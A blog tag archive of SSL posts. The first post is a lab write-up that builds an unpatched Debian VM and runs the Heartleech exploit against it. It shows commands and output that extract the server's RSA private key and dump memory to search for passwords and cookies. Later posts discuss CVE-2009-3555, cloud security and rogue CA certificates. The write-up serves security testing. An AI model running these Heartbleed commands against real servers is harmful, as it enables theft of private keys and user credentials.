Tag Archives: SSL

Testing Heartbleed vulnerability

No fresh news here, but I had been wanting to test the Heartbleed vulnerability for a while and just lacked the time.

I used the following quick setup:

  1. Debian 7.0 virtual machine as a vulnerable host
  2. The Heartleech tool. There are many other tools around, but this one was suggested to me by a coworker who used it successfully during a pentest.

Getting a vulnerable host in your own environment is not that trivial, as most operating systems have now been patched (including the installation ISOs of supported versions).

In my quest, I ended up with Debian 7.0 (Debian 6.x is too old and actually does not suffer from the vulnerability, as it ships a pre-1.0.1 OpenSSL).
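For reference, Debian 7.0 ships OpenSSL 1.0.1e, which sits squarely in the affected range: only 1.0.1 through 1.0.1f are vulnerable to Heartbleed (CVE-2014-0160). A quick sketch to classify a version string (the helper function is mine; also note that Debian backports security fixes without bumping the version string, so on a patched box this is only a hint):

```shell
#!/bin/sh
# Heartbleed (CVE-2014-0160) affects OpenSSL 1.0.1 through 1.0.1f only;
# the 0.9.8 and 1.0.0 branches (e.g. Debian 6.x) and 1.0.1g+ are safe.
is_heartbleed_version() {
    case "$1" in
        1.0.1|1.0.1[a-f]) echo "vulnerable" ;;
        *)                echo "not affected" ;;
    esac
}

# On the VM, feed it the installed version:
#   is_heartbleed_version "$(openssl version | awk '{print $2}')"
is_heartbleed_version "1.0.1e"   # Debian 7.0 -> prints "vulnerable"
```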

To download an old and unpatched installation image of Debian, you need to use Jigdo. This tool downloads all the packages from the Debian archive site and rebuilds the ISO:

jigdo-lite ftp://cdimage.debian.org/cdimage/archive/7.0.0/i386/jigdo-dvd/debian-7.0.0-i386-DVD-1.jigdo

Then, create a virtual machine with no network card, to make sure that the installation process does not retrieve any patch.

Once the Debian virtual machine is set and running:

  1. Edit <code>/etc/apt/sources.list</code> to comment out the lines concerning security updates (keep only the DVD enabled)
  2. Add and configure a network card (<code>eth0</code>)
  3. Install Apache2
  4. Enable SSL: <code>a2enmod ssl</code>
  5. Enable the default SSL web pages: <code>a2ensite default-ssl</code>
  6. Open a browser to check that it all works at <code>https://hostname</code>
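The list above boils down to a handful of commands on the VM (a sketch, run as root; package and site names are the Debian 7 defaults):

```shell
# Steps 3-5: install Apache and enable the default HTTPS virtual host
apt-get install apache2
a2enmod ssl
a2ensite default-ssl
service apache2 restart

# Step 6: the handshake can also be checked without a browser
echo | openssl s_client -connect localhost:443
```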

Using heartleech is incredibly fast and straightforward:

heartleech % ./heartleech 172.25.254.153 --autopwn
--- heartleech/1.0.0i ---
https://github.com/robertdavidgraham/heartleech
786648 bytes downloaded (6.293-mbps)
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA40dv2FdGVHxQRydIyZixnNwnez6bFMyQu+AAjpFmphA39Lzr
4rW8ca8uY0W34jeHx+qTNABkrmfOeZpTFbpCnU7ZDRy8J/KUoq6o26vdkg98fT/t
VqlBPLEp6uD0bazvNp4H5KGO3f1c06y8uBjc4/hOPgiCYYi3aPQpV8ybHqkcdA4K
ps6u9EYvXHwInUwXwOg13OynpYfsxJt2PSF/qoaz7zbU0ie7wMJFFFmXEMwT0uUX
[...]
ko+g0mrTttbz6egHRs3JFmV3oucnGCrTq/Z4Ivcsqdt059UhspDFxMPoesyUjMQs
o8KZF5q2adNTxyoaQPiln9H9GjDSSKt448G9YM7CM7cAd7JkvFBdEjrRsP+4W92B
3EPn1yMCgYEA+LARBdzOfFasv4/UWub85QersrT35hNneTrtaVTBiJR0v7jdXnqe
k0aoHJV/D73j2hW3mGaC9JsnUMfZ3AkoDhfojZzqp2jOlaFNWZr80NDERekJrRTT
3JVFVF33NAW3OWY97/52XRZzcGJTDx9fx8R3guS4tR5O/ETgdREPmAw=
-----END RSA PRIVATE KEY-----

You can also dump the memory to a file:

./heartleech 172.25.254.153 --cert /tmp/debian --read /tmp/test

You can then search the dump for interesting content with <code>strings</code> or any parsing tool of your choice (Yara, for instance).
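For instance, a quick pass with strings over the dump can be wrapped in a tiny helper (the function name and grep patterns are mine, just examples of what to hunt for):

```shell
#!/bin/sh
# Grep the printable strings of a heartleech memory dump for juicy
# material: credentials, session cookies, PEM key blocks...
hunt() {  # usage: hunt <dumpfile>
    strings "$1" \
        | grep -iE 'passw|cookie:|authorization:|BEGIN RSA PRIVATE KEY' \
        | sort -u
}

# On the dump captured above:
#   hunt /tmp/test
```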

Heartleech also offers an alternative method to retrieve the private key. First, save the server certificate (the public key) from your browser to a file, then run it against the dump to look for the matching private key:

./heartleech 172.25.254.153 --cert /tmp/debian --read /tmp/test
--- heartleech/1.0.0i ---
https://github.com/robertdavidgraham/heartleech
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA40dv2FdGVHxQRydIyZixnNwnez6bFMyQu+AAjpFmphA39Lzr
4rW8ca8uY0W34jeHx+qTNABkrmfOeZpTFbpCnU7ZDRy8J/KUoq6o26vdkg98fT/t
VqlBPLEp6uD0bazvNp4H5KGO3f1c06y8uBjc4/hOPgiCYYi3aPQpV8ybHqkcdA4K
ps6u9EYvXHwInUwXwOg13OynpYfsxJt2PSF/qoaz7zbU0ie7wMJFFFmXEMwT0uUX
[...]
ko+g0mrTttbz6egHRs3JFmV3oucnGCrTq/Z4Ivcsqdt059UhspDFxMPoesyUjMQs
o8KZF5q2adNTxyoaQPiln9H9GjDSSKt448G9YM7CM7cAd7JkvFBdEjrRsP+4W92B
3EPn1yMCgYEA+LARBdzOfFasv4/UWub85QersrT35hNneTrtaVTBiJR0v7jdXnqe
k0aoHJV/D73j2hW3mGaC9JsnUMfZ3AkoDhfojZzqp2jOlaFNWZr80NDERekJrRTT
3JVFVF33NAW3OWY97/52XRZzcGJTDx9fx8R3guS4tR5O/ETgdREPmAw=
-----END RSA PRIVATE KEY-----

Neat!
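For the record, the browser is not even needed to save the server certificate; openssl can fetch it directly (a sketch; the helper function is mine, and the host, port and output path match the session above):

```shell
#!/bin/sh
# Fetch a server certificate over TLS and store it in PEM form,
# ready to be handed to heartleech --cert.
fetch_cert() {  # usage: fetch_cert <host> <port> <outfile>
    echo | openssl s_client -connect "$1:$2" 2>/dev/null \
        | openssl x509 -outform PEM > "$3"
}

# Against the vulnerable VM:
#   fetch_cert 172.25.254.153 443 /tmp/debian
```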

You may check this page to get information on vulnerable versions and remediation.

CVE-2009-3555: Safari, fix reached Mountain Lion…

I haven’t investigated much (and will not dig further), but since my upgrade to Mac OS X 10.8 (Mountain Lion), Safari supports safe renegotiation.

Meanwhile, I had received a laconic answer from Apple to my bug report saying that they “are aware of this issue”.

Note that Safari 6.0 on Lion did not (at least on my computer, if someone could confirm)… so, same browser version, different OS: the system SSL library must have been silently updated.

Anyway, good move finally.

CVE-2009-3555: Safari not yet patched ???

The other day I was shocked to find this entry in my Apache logs:

[error] SSL Library Error: 336068931 error:14080143:SSL routines:SSL3_ACCEPT:unsafe legacy renegotiation disabled

It appears when I try to use an SSL client certificate with Safari. Of course, authentication is broken: it simply fails with a 403 error page.

So it seems that Safari is the last major browser that was not patched against CVE-2009-3555!

2009! At least, I quickly checked the other browsers I had around and they were fine: IE, Firefox, Chrome… I am also having an issue with Opera, but although I have not identified the problem yet, it seems unrelated (and does not throw the same error).

Note that I reported the issue to Apple, but I did not receive any answer. Silence on the wire.

Cloud in the security sky or should I see a psychologist?

The “cloud” is a buzzword that has been around for months. The marketing guys are pushing it so hard that every IT person will hear about it at work sooner or later.

Deciding whether to use it or not requires some deep knowledge, because while its pros are clear (you can count on the salesmen to paint a great picture of them again and again), its cons are passed over in silence.

Too bad, because a major disadvantage is security. But guess what? The other day, an “analyst” presenting his study about cloud computing simply swept the issue away in a few words:

“As for the people who doubt the security of the cloud, it is a typical psychological issue: these persons fear change and novelty. There is really nothing concrete to worry about in cloud security.”

Well, I am not sure I am the one who should see a psychologist. Of course, the guy did not give any solid argument, so here we go.

In short, cloud computing exposes to the Internet services that were, in normal conditions, always kept inside an internal network and behind perimeter protections.

Of course, these services offer authentication, but basically almost every traditional web attack will work as usual. After all, we are talking about the same web portals, the same users, the same browsers, etc.

Let’s quickly summarize the potential threats: CSRF, XSS, phishing, SSL attacks (MITM, certificate spoofing), browser exploits and many more.

So really, it is not a question of being crazy, paranoid or reluctant to change. There are just many issues that don’t make the cloud useless, but should incite caution.

Cloud computing can be used for what it is good at (flexibility, convenience), but not to replace a datacenter, and it should not be used where security is a real concern.

Don’t listen to the salesman only; read what some specialists are saying. Here is a compilation of some interesting articles I found:

And last but not least, in case our favorite salesman keeps pushing:

But that’s not all. The same goes for “virtualization everywhere”, but that will be another topic…

Possible use of SSL rogue certificates for spying purposes

Recent work by security researchers on SSL MITM attacks has shown how fragile the whole Internet security design can be.

But whereas some of these attacks concern CAs with insufficient security policies (MD5 collisions) or require some level of social engineering against the user (sslsniff), this paper alerts us to a more serious and stealthy threat.

It explains brilliantly, with real-case scenarios, how a CA (probably under the authority of a government agency or a similarly powerful organisation) can create a rogue certificate that will be silently trusted by our browsers.

The problem lies in the chain of trust: a root CA delegates trust to intermediate CAs, which can then generate any “valid” certificate they want, even for a domain they should not sign.

Excerpt:

<< As an example, the Israeli government could compel StartCom, an Israeli CA to issue an intermediate CA certificate that falsely listed the country of the intermediate CA as the United States. This rogue intermediate CA would then be used to issue site certificates for subsequent surveillance activities. In this hypothetical scenario, let us imagine that the rogue CA issued a certificate for Bank Of America, whose actual certificate was issued by VeriSign in the United States. Were CertLock to simply evaluate the issuing CA’s country of the previously seen Bank of America certificate, and compare it to the issuing country of the rogue intermediate CA (falsely listed as the United States), CertLock would not detect the hijacking attempt. In order to detect such rogue intermediate CAs, a more thorough comparison must be conducted. >>

In such a case, no browser will ever raise an alert, so even the most experienced and most paranoid users would be easily fooled. This makes it very easy for an agency to conduct a man-in-the-middle attack and sniff all of the user’s activity.
Hence the need for an add-on.

As a Firefox user, I am using Certificate Patrol. It basically alerts the user whenever the certificate of a site changes. The inconvenience is that it requires a long learning period, and it also generates quite a lot of false positives (when a certificate is legitimately renewed, for instance).

Christopher Soghoian and Sid Stamm, the authors of the paper above, plan to publish a new add-on, CertLock. It will carefully check the whole chain of trust of a certificate and send out an alert whenever a detail is inconsistent, for instance when the country of the parent certificate differs from the country the rogue certificate pretends to be from.
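The country check itself fits in a few lines of shell. This is only a toy illustration of the heuristic described in the paper, not CertLock itself; the issuer strings below are made up, in the format printed by <code>openssl x509 -noout -issuer</code>:

```shell
#!/bin/sh
# Toy version of the CertLock heuristic: flag a site whose new issuing CA
# claims a different country than the issuer previously seen for it.
issuer_country() {  # extract the C= field from an issuer line
    printf '%s\n' "$1" | sed -n 's/.*C[ ]*=[ ]*\([A-Z][A-Z]\).*/\1/p'
}

seen='issuer=C = US, O = VeriSign, CN = VeriSign Class 3'
new='issuer=C = IL, O = StartCom, CN = StartCom Class 2'

if [ "$(issuer_country "$seen")" != "$(issuer_country "$new")" ]; then
    echo "WARNING: issuer country changed"   # prints for this example
fi
```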

I really hope CertLock is coming soon.

SSL/TLS RFC updated against CVE-2009-3555

A solution has finally been brought forward to fix CVE-2009-3555 and replace the temporary workaround that broke client authentication.

At last, the IETF agreed on a fix, as Marsh Ray informs us, though it will still take some weeks for the whole validation process to complete.

Moreover, as it requires both servers and clients to be patched, it will take months before the fixes are fully deployed and client authentication architectures work again. The client side will take the longest, of course, so I feel sorry for those who have a large fleet of machines to manage.

As far as I am concerned, fortunately, I will just have a few browsers that I manage directly to update. Anyway, still more patience is needed!